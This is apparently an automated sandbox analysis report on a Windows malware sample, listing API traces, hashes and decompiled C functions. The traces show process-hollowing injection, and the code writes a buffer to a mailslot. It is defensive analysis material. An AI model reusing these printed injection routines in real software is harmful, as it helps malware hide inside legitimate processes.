  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:34
Initial sample Analysis ID:60136
Initial sample SHA 256:3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:gifmsg.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
